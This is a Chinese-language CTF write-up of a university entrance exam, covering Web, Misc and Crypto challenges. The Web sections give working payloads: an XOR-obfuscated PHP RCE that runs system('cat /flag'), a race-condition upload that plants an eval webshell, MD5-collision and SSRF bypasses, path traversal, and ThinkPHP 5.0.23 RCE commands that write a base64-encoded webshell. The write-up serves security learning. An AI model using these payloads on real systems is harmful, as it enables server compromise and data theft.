云曦2024秋季学期开学考复现
Web
学习高数
资料:命令执行中关于PHP正则表达式的一些绕过方法_正则表达式中过滤的怎么绕过-CSDN博客
记 [CISCN 2019 初赛]Love Math三种解法-CSDN博客
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘_代码执行 异或绕过-CSDN博客
浅谈PHP代码执行中出现过滤限制的绕过执行方法_php过滤绕过-CSDN博客
1.根据提示,有10000个页面,index1.html...,并且经过测试发现几乎所有的页面回显的内容都一样,这个时候就会想到会不会有不同页面的情况
2.这里使用bp进行爆破,发现8887页面的回显内容不一样
3.访问cvFXZohgjf这个文件,得到php代码,接下来就是代码审计
<?php
error_reporting(0);
//你的高数怎么样
if(!isset($_GET['GS'])){
show_source(__FILE__); //这部分代码检查URL参数GS是否已设置。如果没有设置,它将使用show_source()函数显示当前文件的源代码
}else{
//例子 GS=20-1
$content = $_GET['GS'];
if (strlen($content) >= 60) {
die("不是哥们"); //代码首先获取GS参数的值,并检查其长度是否小于60个字符。如果长度超过或等于60个字符,则脚本终止并显示消息“不是哥们”。
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("新号别搞");
}//代码定义了一个黑名单,包含了一系列不允许在GS参数中出现的字符。然后,它遍历这个黑名单,使用正则表达式检查$content中是否包含这些字符。如果找到任何黑名单中的字符,脚本将终止并显示“新号别搞”。
}
//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("虾啊");
}//代码定义了一个白名单,包含了一系列允许在GS参数中使用的PHP数学函数。然后,它使用正则表达式提取$content中所有可能的函数名,并将这些函数名与白名单进行比较。如果$content中包含任何不在白名单中的函数,脚本将终止并显示“虾啊”。
}
eval('echo '.$content.';'); //最后,如果通过了所有安全检查,代码将使用eval()函数执行$content中的PHP代码,并通过echo输出执行结果。
}
要求:
1.字符长度
2.过滤字母、部分特殊符号,注意这里虽然过滤了部分字符,但是没有过滤^,所以我们可以异或取反创造我们想要的字母
3.绕过preg_match_all
4.既然没有ban ^符号,那么我们就可以通过异或构造想要的字母
给出脚本:
<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
for($i = 0;$i < 9; $i++){
for($j = 0;$j <=9;$j++){
$exp = $payload[$k] ^ $i.$j;
echo($payload[$k]."^$i$j"."==>$exp");
echo "\n";
}
}
}
5.构造payload,得到flag
?GS=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /flag
你能跟上我的speed吗
资料:第二个资料是使用的方法,比较有用
文件上传-条件竞争-DoraBox_12333119的技术博客_51CTO博客
1. 经过测试,发现文件上传之后得到的都是同一张图片,根据题目的意思,发现是和速度有关,想到文件上传类型中的条件竞争,上传文件写入一句话木马:
<?php $op=fopen("shell.php","a+");fwrite($op,'<?php @eval($_POST[cmd]);?>');fclose($op);echo(333) ?>
使用fopen函数以追加模式("a+")打开名为"shell.php"的文件。
如果文件不存在,将会创建该文件。
"a+"模式意味着文件指针会放在文件的末尾,用于追加内容,但也可以读取文件。
使用fwrite函数向打开的文件中写入PHP代码。
这段代码是一个简单的PHP后门,它使用eval函数执行通过POST请求发送的名为"cmd"的参数的内容。
@符号用于抑制错误消息的显示,即使执行了非法的PHP代码,也不会在输出中显示错误信息。
使用fclose函数关闭文件指针。
2.抓包上传文件的请求并发送到intruder
3.抓包访问上传文件的路径
4.两处的payload type都设为null payloads,payload setting选择Continue indefinitely(无限循环抓包)
5.两边同时爆破,在文件上传路径页面爆到显示333页面停止
6.发送到repeater,更改1.php为shell.php
7.最后使用蚁剑连接,成功连接
8.找到flag
ezezssrf
1.进入页面是php代码,进行代码审计
一共有四个地方需要绕过:
第一处:md5的弱比较绕过,使用数组绕过
yunxi[]=1&wlgf[]=2
第二处:强制转换成字符串型的md5的强比较绕过
参考:md5强比较&弱比较-CSDN博客
第三处:ssrf的相关绕过(@)
GLG=http://blog.csdn.net@127.0.0.1
第四关:无回显的RCE,tee命令
cmd=cat /flag | tee 1.txt
2.构造payload
yunxi%5B%5D=1&wlgf%5B%5D=2&yunxii=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&wlgff=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&GLG=http://blog.csdn.net@127.0.0.1&cmd=cat /flag | tee 1.txt
3.抓包进行传参
4.页面访问这个txt文件,得到flag
小小py
资料:任意文件下载、文件读取_poc-yaml-hanming-video-conferencing-file-read wind-CSDN博客
Web漏洞-任意文件读取漏洞-CSDN博客
任意文件读取漏洞的利用指南 - 简书
[第一章 web入门]afr_3_ctfhub web afr-3-CSDN博客
考查:任意文件读取、session伪造、目录穿越
1.打开页面,题目的大致意思是我有1336金币,买flag需要1337金币,点击上面的大图,会直接下载图片
2.用bp抓包,发现图片的下载路径
3.尝试任意文件读取,../../../../etc/passwd
如果存在回显,则代表该网站存在任意文件读取漏洞
4.接着查看当前进程运行的环境变量/proc/self/environ,得到flag
真正的hacker!(flag1) (flag2)
资料:https://www.cnblogs.com/arrest/articles/17515491.html
1.打开页面,发现有ThinkPHP V5的字样
2.一般遇到ThinkPHP框架,就要搜索相关的版本的漏洞,传参?s=1,出现具体的版本,5.0.23,那么就搜索相关版本的漏洞,发现是远程代码执行漏洞
3.get传参?s=captcha,post传参,查看系统信息以及使用的相关命令
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
但是我们要知道文件写到哪里,先pwd查看下目录:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
注意:这里ls,发现可疑的uploads,刚好这里涉及到远程代码执行漏洞
4.查看根目录,发现flag1
5.获得flag1
6.发现页面提示如果要得到第二个flag,就要进行getshell,既然知道了路径,又可以写了一个文件,于是就写入webshell ,但是发现页面报错
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo <?php @eval($_POST['cmd']); ?> >>/var/www/public/shell.php
7.发现行不通,可能是什么东西被过滤了,试试base64的,发现蚁剑连接,连接成功
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" |base64 -d > /var/www/public/uploads/shell.php
8.这样可以找到两个flag
文件上传
参考:SUCTF2019 upload-lab2
云曦2024秋季开学考-CSDN博客
1.首先在admin.php中找到有关flag的地方
2.很明显要触发__wakeup()魔术方法,触发__wakeup()就需要触发反序列化
misc
misc1
1.解压之后得到pcap文件,发现一个长度规律,两个稍微比较长的会夹着一个比较短的
2.追踪数据流,发现长度短的隐藏着flag的信息
3.将含有信息的追踪流拼接在一起,得到flag
flag{7823yed-3892hu-7euiwb-euwidbh82-7ueidw}
misc大杂烩
第一部分(盲水印)
flag1{hdy12-
第二部分(word隐藏文字)
打开需要查找隐藏内容的word文档,按【Ctrl+A】全选文档,然后单击鼠标右键,点击【字体】,打开“字体”对话框。在“字体”对话框中,将“效果”栏下的【隐藏】取消勾选,然后点击【确定】,这样文档中隐藏的文字就全部取消隐藏状态并显示出来了,且可以在打印中显示出来,方法很多,可自行查找
flag2{1yhgzc5-
第三部分(文件头修改+base64转图片)
拖进010editer中发现是base64编码,这个时候想到base64转图片
解码之后是一张二维码
解这个二维码
flag3{Ypt0a2-
第四部分(Deepsound音频隐写)
flag4{ghj8-
第五部分(掩码爆破+埃特巴什码解密)
发现第五部分加密,用密码解密,把掩码进行爆破
成功打开文件
这个是埃特巴什码解密
flag5{7ugak-
考点6(文件16进制颠倒)
用winhex打开,发现里面的字符反过来可以正常阅读,所以文件被倒置了,利用python进行倒置回来
相关脚本:
with open("原文件位置","rb") as fs:
with open("flag","wb") as f:
f.write(fs.read()[::-1])
将文件改成zip文件,得到第六部分
Flag6: 78uiag}
Yunxi{hdy12-1yhgzc5-Ypt0a2-ghj8-7ugak-78uiag}Yunxi{hdy12-1yhgzc5-Ypt0a2-ghj8-7ugak-78uiag}
misc2
Crypto
mmmd5
1.打开txt文件,发现一个规律,每一串数字用md5解出来就是flag,可以直接一个一个找,也可以写脚本,进行解码
大佬的payload:
import hashlib
# 给定的 MD5 哈希值列表
output = ['0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']
# 常见字符及其 MD5 哈希值的字典
common_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}-"
md5_dict = {hashlib.md5(char.encode()).hexdigest(): char for char in common_chars}
# 还原原始字符串
flag = ''.join(md5_dict.get(md5_hash, '?') for md5_hash in output)
print("Flag:", flag)
babycrypto
原题:https://blog.csdn.net/2301_82327951/article/details/138328929
本质就是将flag转二进制再用0填充,得到514位加密后二进制串,再将二进制翻转后进行加密程序custom_add,最后直接输出结果。
加密程序是按位置值进行加法后取模,于是反向得到解密方案即按位加上(10-位置值)后再对10取模,接着利用现成的翻转函数,从而得到填充后的二进制数。不确定填充了多少0,保险起见手动从最后一个1开始去0再转字节型字符串,若不成功就加一位0,不过不需要加。
from Crypto.Util.number import *
from tqdm import *
b = 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567891134567799012455779902334677900124556899012356679001344567990233457780113445788911245667991134457799122355788001245578890223467799013445688902335578800123457889113346778902344567991223557880013355689911245667900124556789122355788001234678891133467799023445679902334568900123556899012456679001344578801233467789112355779912234577990233556780113
c = list(map(int,str(b)))
#part1 reverse custom
for i in range(len(c)):
c[i] = (c[i] - 1 - i) % 10
#part2 recover swap
for i in range(len(c)//2):
temp = c[i]
c[i] = c[511-i]
c[511-i] = temp
#part3 get flag
flag = "0" + "".join(list(map(str,c)))[:-1]
print(long_to_bytes(int(flag,2)))